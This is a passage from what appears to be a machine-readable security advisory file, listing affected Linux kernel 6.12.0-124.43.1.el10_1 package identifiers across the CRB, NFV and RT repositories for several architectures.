"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
